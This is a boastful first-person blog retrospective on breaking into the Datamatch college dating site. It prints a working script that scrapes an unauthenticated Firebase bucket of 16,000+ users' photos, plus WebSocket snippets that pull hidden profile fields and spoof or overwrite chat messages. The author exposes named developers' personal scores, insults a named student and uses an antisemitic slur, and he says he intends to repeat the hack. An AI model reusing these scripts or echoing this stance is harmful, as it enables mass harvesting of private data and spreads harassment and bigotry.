fumo.club

Hacking Datamatch: A Retrospective

The Harvard Crimson newspaper wrote an article about this hack [archived] in March 2024, shortly after it happened. What you’re about to read is my firsthand account, six months after its publication, along with some never-before-seen evidence.

Datamatch is a dating website for college students at a handful of campuses around the country, with tens of thousands of users. It opens up around Valentine’s Day every year and is meant to be more of a cute icebreaker than anything. There’s no nefarious algorithms or profit motive at work here, just a quirky questionnaire and your standard profile fields like your name, gender, and… Rice Purity Test score?

JSON data of a user’s profile

For context, the Rice Purity Test is an online quiz where you check off various immoral, illicit, or sexual things you’ve done. Your score starts at 100, and is deducted by 1 for every box you check, so a lower score means you’ve done more degenerate shit.

Plenty of Datamatch users filled out their profiles, and volunteered their Rice Purity Test scores, trusting that the site would keep their data safe. *LOUD BUZZER* WRONG!

A Crime of Opportunity

The following recollection is almost entirely from memory, so forgive me if details are scant. The chat where we orchestrated this got nuked, but I held on to some things.

We came across Datamatch’s vulnerabilities entirely by chance. Basically, someone figured out that you could view profile pictures from their Firebase store without authentication. The site only allows sign-ups from people with email addresses at one of the whitelisted universities, so this was the first sign that something was amiss. Here’s a random URL I picked:

https://firebasestorage.googleapis.com/v0/b/datamatch2024.appspot.com/o/profile_pics%2F4d9dBuit4bYlsLYs7JKEMMTqpjV2%2Fimage1.jpg?alt=media&token=707a29d7-e0ef-46cc-9a1b-d9afd462fb69

Obviously, it’s gone now. Here’s the actual picture, so you know I’m not making this up :)

image1.jpg

The token seems to just be time-based, since it didn’t meaningfully restrict access to the images. But profile pictures on their own aren’t really sensitive information, and the URLs were randomized, so this still wasn’t the worst thing in the world.

Note that the involvement of the person who originally unearthed this ends here. From this point on, me and a couple others who saw his message went into a private chat and decided to see how far we could take it. We were students at one of the whitelisted universities, so we signed up as ordinary users with bare-bones profiles and started poking around.

Well, you don’t even need an account to figure this first one out. Using the Firebase JavaScript library, I was able to write up a simple script to list all objects in the datamatch2024 bucket, then download them.

 1import path from 'node:path';
 2import http from 'node:https';
 3import fs from 'node:fs';
 4import { fileURLToPath } from 'node:url';
 5
 6import { initializeApp } from 'firebase/app';
 7import { getDownloadURL, getStorage, ref, list } from "firebase/storage";
 8
 9const firebaseConfig = {
10    projectId: "datamatch2024",
11    storageBucket: "datamatch2024.appspot.com",
12    appId: "datamatch2024",
13};
14function download(url, dest) {
15    return new Promise((resolve, reject) => {
16        if (fs.existsSync(dest)) {
17            resolve(null);
18            return;
19        }
20        var file = fs.createWriteStream(dest);
21        http.get(url, function(response) {
22            response.pipe(file);
23            file.on('finish', function() {
24                file.close(resolve);
25            });
26        }).on('error', function(err) { // Handle errors
27            fs.unlinkSync(dest);
28            reject(err.message);
29        });
30    });
31}
32
33const app = initializeApp(firebaseConfig);
34const defaultStorage = getStorage(app);
35const __filename = fileURLToPath(import.meta.url);
36const __dirname = path.dirname(__filename);
37const dataDir = path.resolve(__dirname, "data24");
38
39async function downloadFiles(refs) {
40    const deepestRef = refs[refs.length - 1];
41    const filepath = path.join(dataDir, ...refs.map(r => r.name));
42    try {
43        fs.mkdirSync(filepath);
44    } catch {}
45
46    let pageNum = 0;
47    let pageToken = undefined;
48    do {
49        console.log("Page " + (++pageNum));
50        let results = await list(deepestRef, {
51            maxResults: 1000,
52            pageToken,
53        });
54        pageToken = results.nextPageToken;
55
56        for (const i of results.items) {
57            const url = await getDownloadURL(i);
58            // only print if new file
59            if (await download(url, path.join(filepath, i.name))) {
60                console.log("Downloaded "+ i.fullPath);
61            }
62        }
63
64        // recurse down the file tree
65        for (const p of results.prefixes) {
66            console.log("Found prefix " + p.name);
67            downloadFiles([...refs, p]);
68        }
69    } while (pageToken);
70
71}
72
73(async () => {
74    const listRef = ref(defaultStorage, "/");
75    downloadFiles([listRef]);
76})();

I now had everyone’s pictures (16,724 accounts, to be exact). But wait, there’s more; I found some fun internal documents too. I reformatted these slightly for clarity.

stats/word_freq.json (abridged)

 1{
 2    "All": [
 3        {
 4            "word": "food",
 5            "occurrences": 378
 6        },
 7        {
 8            "word": "person",
 9            "occurrences": 147
10        },
11        {
12            "word": "student",
13            "occurrences": 378
14        },
15        {
16            "word": "fan",
17            "occurrences": 178
18        },
19        ...
20    ]
21}

stats/love_language_gender.json

 1{
 2    "woman": {
 3        "Quality Time": 0.466,
 4        "Physical Touch": 0.186,
 5        "Words of Affirmation": 0.148,
 6        "Acts of Service": 0.16,
 7        "Gifts": 0.04
 8    },
 9    "man": {
10        "Words of Affirmation": 0.089,
11        "Quality Time": 0.506,
12        "Physical Touch": 0.306,
13        "Acts of Service": 0.078,
14        "Gifts": 0.021
15    },
16    "nonbinary": {
17        "Words of Affirmation": 0.117,
18        "Physical Touch": 0.249,
19        "Quality Time": 0.446,
20        "Acts of Service": 0.146,
21        "Gifts": 0.043
22    }
23}

stats/rice_purity_avg.csv (abridged)

school,score,numStudents
Princeton,66,430
MIT,73,327
Harvard,60,1269
Caltech,66,79
Columbia,60,340
Harvard-MIT,50,247
Dartmouth,57,169
UPenn,68,77
UChicago,63,444
CalPoly,61,82
UC Davis,68,140
UCLA,78,50
Yale,58,71
Brown,63,330
Northeastern,67,11
UCSD,68,42
NYU,65,12
CMU,77,9
USC,65,7
UC Berkeley,33,2

The Datamatch team probably tunes their algorithm from year to year, so the fact that they compiled these stats is innocent enough, but it’s kind of interesting to see all the raw data points.

The table of Rice Purity scores, for example, confirms our biases about MIT and Carnegie Mellon being nerdy schools, but also offers some surprises too. I didn’t expect UCLA, which has an active party scene, to be that high, and for the Ivy League schools or UC Socially Dead to be that low. Berkeley is just an anomaly.

Hopefully seeing some secret stuff got you excited. Ready to dig even deeper?

“The Cybersecurity Equivalent of Freeballing Jorts”

Armed with our own accounts, we cracked open our browsers’ Developer Tools and started poking around. The website has a search feature, where you can look people up by name. This didn’t really make sense to me, because finding your friends on a dating app is sure to cause embarrassment, and the whole point is to meet new people, right? In any case, it was useful in that it introduced a gaping security hole. As one member of our crew put it, “the cybersecurity equivalent of freeballing jorts”. Almost as bad as a cyber-goatse.

All you have to do is type a name in the search bar, and watch the WebSocket responses come in.

Profile JSON, mostly unredacted

Another profile’s JSON, cut off but not redacted

It’s possible to programmatically look up a profile by ID, too, once you have the WebSocket handle:

 1var i = 69; // just a message counter
 2function requestProfileWebsocket(ws, uid) {
 3    ws.send(JSON.stringify({
 4        "t": "d",
 5        "d": {
 6            "r": i++,
 7            "a": "q",
 8            "b": {
 9                "p": `/publicProfile/${uid}`,
10                "h": ""
11            }
12        }
13    }));
14}

WebSocket requests

Yup, even the “publicProfile” endpoint sends the “private” fields. This was huge. It’s what prompted the redacted screenshot at the top of this page, which originates from an Instagram story, which culminated in the Crimson covering it. Probably the only thing that could have made this worse was revealing email addresses and plaintext passwords, but luckily for the users, we found no sign of those.

At this point we’re just screwing around. The very next thing we did was look up the Rice Purity scores of the Datamatch devs and take the piss out of them.

Dev 1 has a score of 48

Dev 2 has a score of 51

Oh, and remember how I scraped the whole Firebase bucket earlier? The random strings in the URLs of the profile pictures are actually user IDs, so we have a list of most of the users now. Combine this with publicProfile and you become omniscient. Real name, real face, hobbies, music taste, social media account, school, graduation year, even the name of their dorm and their weekly schedule. You could play God with all that info.

Not every user sets their profile pics, but I think we managed to get a pretty good amount of them. Datamatch reports “22,000+ users” on their homepage, and we got over 16,000. It’s fair to assume that the rest of them either didn’t finish the questionnaire that puts them in the dating pool, or were not too serious about the whole thing, or they just didn’t want to get too personal. (I certainly don’t blame them for the last one.) In other words, the same people who don’t have a profile pic are likely the ones who don’t have information worth harvesting.

Ok, that was pretty fun, but we’re not done yet. For our next experiment, me and an accomplice deliberately matched with each other.

Wherefore Art Thou Romeo?

I was trying to see if you could leak people’s matches, but I found something else instead. Datamatch lets you send direct messages to people you match with, and it even has a few pre-written conversation openers to help you out. It’s just that the way this chat system is implemented is pretty sloppy.

By studying the WebSockets going in and out, I came up with a way to programmatically send a message.

 1var i = 69; // message counter
 2function sendConvoStarterWebsocket(ws, convo, msg, isConvoStarter=false, hash='xxxxxxxxxxxxxxxx') {
 3    ws.send(JSON.stringify({
 4        "t": "d",
 5        "d": {
 6            "r": i++,
 7            "a": "p",
 8            "b": {
 9                "p": `/messages/${convo}/-Nr3${hash}`,
10                "d": {
11                    "convoStarter": isConvoStarter,
12                    "name": "user1",
13                    "text": msg,
14                    "timestamp": (new Date()).getTime()
15                }
16            }
17        }
18    }));
19}

The convo variable here is just an identifier that represents a particular conversation between you and your match. The hash is an identifier for an individual message, which I guess the client is responsible for generating. It is always 20 characters long with the -Nr3 prefix, so you can just make up the rest of the digits.

The chat client regularly polls the WebSocket server for the latest message, which has some interesting implications. If the server repeats the same message ID twice in a row, but with different contents, the last message in the conversation will just get overwritten. In other words, they unintentionally made it so you can edit messages. Me and my pentesting partner tested this out while sitting right next to each other and made sure it affected both users. It even persisted after refreshing, so it was probably overwriting the value in the database, too.

user1 refers to the current client’s user, and user2 is the other person (not sure if this is always the case). I don’t remember if we were able to successfully spoof a user2 message, but I do remember being able to overwrite a user2 message with a user1 message. This is obviously not how an edit feature should work. In fact, it’s more like a delete feature, but for the other person’s most recent message. This could make for some funny gaslighting.

(In the latest Harvard Crimson article, a Datamatch dev downplayed this exploit by saying that it was similar to editing a text message. I’m still not sure that they get it.)

And as the other variables imply, it is totally possible to spoof the “conversation starter” decorations on a message, as well as the timestamp. Check it out:

Fake conversation starter

We started writing sexual conversation starters from 1200 AD.

CBT conversation starter from year 1200

I revised my message right after to use Olde English, but I didn’t take a screenshot, oops.

Future timestamps work as well:

Conversation starter from year 6969

Anyway, all these findings are pretty interesting, I think, but unfortunately the story didn’t go public in the way I wanted, which is partly why I waited until now to reveal everything. Go read the initial Harvard Crimson report [archived] for context on this next part.

The Sungjooish Question

So, you might be thinking, who the hell is this Sungjoo Yoon guy that’s mentioned in the article? Is that you? No. He was one of the first Harvard people to find the Instagram story and promised to put us in contact with the devs, or at least publicize it to the Harvard student body if they tried to sweep it under the rug.

Sungjoo’s first message

In retrospect, we could have emailed Datamatch without the middleman, but I guess we wanted some clout. Or maybe it’s more accurate to say we wanted to anonymously cause some chaos, since no one wanted to own up to doing something that pissed off a good deal of people and was possibly even illegal. Having a connection at Harvard to act on our behalf seemed to be the best way to do that at the time.

So our guy who was in contact with Sungjoo had shown him how to reproduce the exploit. Then Sungjoo made a write-up [archived] and for the first week he even published an excerpt of some of the Rice Purity scores, with first and last initials only.

Sungjoo explaining how he would give us credit

Unfortunately, he also turned out to be a prick. His writings are some of the most pretentious fluff I’ve ever read, and my standards were already low – this is Ivy League youth we’re talking about. He types like a social justice warrior. “Bernie Marx” was his pen name, are you kidding me? We did this as an act of simple mischief, not hacktivism, but he sure tried to LARP like it was. I detest communists, by the way.

As if that wasn’t enough, he changed his Instagram profile picture to Jenkins from South Park, as if he was the 400 lb hacker mastermind behind all of this. It pissed me off that this insufferable little freshman hardly even acknowledged that the vulnerability wasn’t his own discovery. Anyone who knows can tell from his writings that he doesn’t have the technical knowledge required to actually understand the exploit firsthand. He’s just a political science major, but that didn’t stop him from claiming to have a penchant for coding, or whatever. I’m not gonna pretend that the vulnerabilites were hard to find, but how did anyone seriously believe for a second he was capable of discovering them?

After the first article [archived] was published in the Crimson, our liasion with Sungjoo was understandably upset that he took the credit for himself, so he called him up. When Sungjoo answered the phone, he carefully chose his words, acting like his lawyer was in the room with him, and claimed that angry parents were threatening to sue him. That actually sounded kind of plausible for a sec, until you remember that he didn’t reveal anyone’s real name, and he was still gloating about the leak to his classmates. The kid was just playing mind games to discourage us from rightfully claiming credit for ourselves.

Sungjoo whined to the journos about how he was afraid of getting bullied or whatever for being “the leaker”, but simultaneously elected to divulge his identity to get his own personal profile [archived] in the newspaper. All while he did jack shit. Maybe it would’ve been funny if he got thrown under the bus instead of getting recognized as a “campus celebrity”. I’m not a Harvard student so I can’t actually gauge what the campus reaction was, but from what I gleaned online at the time, it was part astonishment and part resentment towards Sungjoo. I wasn’t gonna be satisfied with just that.

Eventually, I knew I had to go to the Harvard Crimson myself, just to strip that bit of pride away from him, and that’s how we ended up with the follow-up article linked at the very top of this page. I also reported on the still-unknown direct messaging vulnerabilities, which weren’t such a big deal, but were definitive proof that we got there first.

I did deceive my accomplices by going to the journalists because we all agreed to keep our involvement in the hack a secret. Some of them still believed Sungjoo was serious about the legal repercussions part. I don’t even like journalists. They demanded I turn over private conversations, and made it into kind of a hit piece against us. Boo-hoo, we said some politically incorrect things while looking through people’s profiles behind closed doors. I’d do it again in a heartbeat. That’s not the worst thing the journos did, though. They asked for a second source to corroborate what I said, so I gave them the name of the guy who was in contact with Sungjoo. I wish they would have respected his anonymity, but they didn’t. Luckily for me, my colleagues never identified me as the mole. Still, I went to the Crimson in the first place because I wanted petty revenge, and I’m not especially proud of that.

The Moral of the Story

There is no moral dilemma here. Datamatch has admitted to fucking up their handling of personal data before [archived]. Just a couple years ago, they literally published GitHub repositories with all your info and left them on public, guys. It says it right there. Back in 2021, they claimed that the very same fields marked “private” that we discovered in the API are actually supposed to be public. They haven’t even updated the privacy page since 2023, so there’s no official mention of this leak. No one seems to care! It was only a matter of time until someone dug around and found something else they shouldn’t have. That’s what I’m here for. I’m no saint, I’m posting people’s personal data without permission for some shock value, but at least I’m making an effort to raise awareness. Heck, I even offered some suggestions to the Datamatch devs while being interviewed by the Crimson.

And you know what, Harvard doesn’t produce the brightest programmers – it’s a liberal arts school. In fact, the whole Ivy League is just a breeding ground for future snakes – politicians, doctors, businessmen, and the like. Full of legacy kids, diversity admits, and a disproportionate amount of J€w$. This particular website is just run by a club at their school which is naturally gonna have a high turnover rate. I can’t necessarily blame them for their incompetence; they’re bound to repeat their mistakes.

It’s also not just a Datamatch problem. This very same year, another dating site called Duolicious had all its user data leaked online. Before that, they were giving researchers full access to their data. Dating sites are pretty much honeypots by design. I can’t believe I have to say this, but all online communication is best done anonymously, or at least behind a pseudonym. Using your true identity creates a cringe TMI situation at best, and can get you cancelled/doxxed/swatted at the worst.

Is what we did illegal? I’m inclined to think otherwise, but I’m not taking any risks here, since they did lock up weev for scraping public API endpoints, much like we did.

The bigger issue here is that people willingly hand their info over to Datamatch/Duolicious/etc. time and time again in spite of all the warning signs. I think they need to take some responsibility for that, and learn some goddamn opsec. Normies in college mostly just want attention, though, and they probably don’t think twice about privacy. Look at how Sungjoo couldn’t stop attention whoring about the hack that he didn’t even pull off. He acts all preachy about raising “ethical awareness” for data privacy, and he almost has a point, but then immediately gives up any notion of ethics or privacy by outing himself as the “hacker”. I bet he wanted to put this on his resume so bad, right alongside his New York Times op-ed. Nothing ever changes about these Ivy League snakes, I swear.

So could a Datamatch incident happen again? I think that would be fucking hilarious, and I’ll certainly try to make it happen, if for no reason other than my own entertainment. And if it does happen, you’ll hear it from the source.

Fumo out.

DataCrack: Made with ❤️ in Los Angeles


Bonus Finds

I scraped all the data I could from Firebase because I knew Datamatch was going to tighten their security sooner or later, and I actually found the assets from previous years. All you have to do is swap the 2024 in datamatch2024 for 2023, 2022, or 2021. The site is supposed to start from a clean slate every year, so this was a pleasant surprise. Maybe they kept it around for internal use?

I couldn’t get the profile data, but like before, I did get everyone’s pictures and the stats compiled by the devs.

datamatch2021 - stats/profile.csv

"profile","Algo","Both","Search","total"
"Has bio and photo",0.329464988198269,0.0819564647259376,0.0660896931549961,0.477511146079203
"Only has photo",0.274126800198643,0.0509849362688297,0.0489985101804337,0.374110246647906
"Only has bio",0.259528130671506,0.0446914700544465,0.0390199637023593,0.343239564428312
"Has neither",0.178184534927157,0.0264288382517744,0.0351139335076578,0.239727306686589

The columns might represent different ways that users found each other? Looks like the search feature is pretty underutilized, as I expected. Odd that the totals don’t add up to 1.

datamatch2023 - stats/thirst-index.csv

School,2024,2023,2022,2021,total
Dartmouth,0.36589113257243194,0.4675153643546971,0.2776558384547849,0.26953467954345917,1.4038630377524144
Williams,0.32670744138634045,0.45565749235474007,0.2329255861365953,0.2528032619775739,1.269113149847095
BC,0.11498147167813658,0.2420328215987295,0.24182106934886183,0.18930651138168342,0.7894123875066172
UW Madison,0.2592733017377567,0.3010742496050553,0.20843601895734598,0.2154818325434439,1.0647709320695105
Claremont,1.7670364500792393,1.8811410459587956,1.6949286846275753,1.1553090332805072,6.550713153724248
WashU,0.9000676132521974,1.0947937795807978,0.8947937795807979,0.777552400270453,3.72183908045977
Vanderbilt,0.36162675357800766,0.2183647442255916,0.10542723536913702,0.05781493552501063,0.743942185064475
Caltech,0.9635258358662614,1.4488348530901722,0.790273556231003,0.4518743667679838,3.6950354609929077
Harvard,1.1635928480923554,1.5113332394762777,1.2362382092073771,1.4050401238913135,5.35942559481909
UChicago,0.8114830003968779,0.49503902632623364,0.41764783701547825,0.25955814261145654,2.008466728403228
CMU,0.11536830199349639,0.11310617842499647,0.2431782836137424,0.09416089353880956,0.6065318818040436
Brown,0.7368963486454653,0.6604829210836278,0.7370435806831567,0.5222320376914017,2.679770318021202
UIUC,0.03214792094678665,0.05396568187736914,0.0354755635290373,0.015943748372348736,0.13944269220752914
BU,0.10375075620084695,0.10429522081064731,0.07132486388384755,0.037749546279491834,0.326497277676951
Yale,1.1451543739279588,1.2352058319039452,1.077401372212693,0.698327615780446,4.18696397941681
UC Davis,0.03095345684591053,0.029016848492673164,0.06607062165128139,0.05125556774901556,0.19001355625847266
McGill,0.17403325238184195,0.14391929759013639,0.11959648795068185,0.09777694750607137,0.5544554455445544
Carleton,1.2189638318670577,0.8699902248289345,1.0210166177908113,0.6075268817204301,3.7253176930596283
MIT,0.3318240620957309,0.5351444588184562,0.48296679603277276,0.22660629581716257,1.5797757654161275
Princeton,0.5511676476172395,0.4909815834440858,0.2992215682551737,0.1965065502183406,1.5471805581925195
Bates,0.19776119402985073,0.19669509594882728,0.1257995735607676,0.45362473347547977,0.9909381663113006
NYU,0.017104377104377105,0.012087542087542088,0.008484848484848486,0.006767676767676768,0.045791245791245785
UPenn,0.23095190975658025,0.21096378389075796,0.15426479319216307,0.07599445873738374,0.700376014248961
UCLA,0.021518987341772152,0.06518987341772152,0.04158227848101266,0.02420886075949367,0.1542721518987342
Furman,0.6464818763326226,0.7974413646055437,0.9313432835820895,0.5987206823027719,2.9739872068230273
Smith,0.384006334125099,0.569279493269992,0.45288994457640536,0.27117973079968327,1.6785431512272366
USC,0.019,0.02457142857142857,0.03823809523809524,0.039285714285714285,0.12366666666666667
Wesleyan,0.1844527787248551,0.3689055574497102,0.5779065802932152,0.36549607909989773,1.501534265257416
Columbia,0.08912010857272111,0.08052476815200181,0.10642388599864284,0.11173942546935083,0.40262384076000907
UCSD,0.04286791030714151,0.047861315244017336,0.03225299918346838,0.015200050248099993,0.1450599836693675

This one just had a funny name. I’m not sure what it means. Harvard students be hella thirsty.